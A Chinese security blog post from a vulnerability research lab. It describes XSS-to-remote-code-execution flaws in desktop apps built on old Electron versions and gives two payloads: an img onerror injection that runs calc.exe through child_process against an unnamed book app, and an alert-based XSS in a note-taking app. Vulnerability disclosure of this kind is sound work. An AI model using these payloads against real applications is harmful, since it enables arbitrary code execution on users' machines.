查看原文
科技

有手就能捡到的0day漏洞

CVES实验室 山海之关 2023-11-25

CVES实验室

      “CVES实验室”(www.cves.io)由团队旗下SRC组与渗透组合并而成,专注于漏洞挖掘、渗透测试与情报分析等方向。近年来我们报送漏洞总数已达八万余个,其中包含多个部级单位、多个通信运营商、Apache、Nginx、Thinkphp等,获得CNVD证书、CVE编号数百个,在不同规模的攻防演练活动中获奖无数,协助有关部门破获多起省督级别的案件。

前言

      CFW跑路事件闹得沸沸扬扬,在群里看到有搞安全的小伙伴吐槽了下CFW经常出洞,于是想到了去年那个CFW RCE,那个洞和之前蚁剑RCE一样的,都是基于electron组件的XSS2RCE,原理其实没啥好说的。总结一下就是如果你遇到了gui好看的windows应用,那么只要其功能有框你就插,有参数你就改即可。

      所以,理论上来讲,只要用了electron(旧版本)组件开发的应用都会存在这个漏洞呢?带着这个疑问,我找到了electron官网的客户案例:

http://www.electronjs.org/apps

全测是不可能全测的,也没必要全测,也可以通过搜索引擎找到使用了electron组件的国产应用来测。

漏洞1-某图书软件

xss2rce的payload:

<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>

导入以后,直接点击即可触发:

漏洞2-某云笔记

xss的payload:

<img src=x onerror="javascript:alert(/xss/)">

没想到的是移动端也能弹(指定是非electron问题了):

xss2rce没成功,应该是有沙箱,逆向师傅也没分析出个所以然,所以,到此为止。

继续滑动看下一个

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存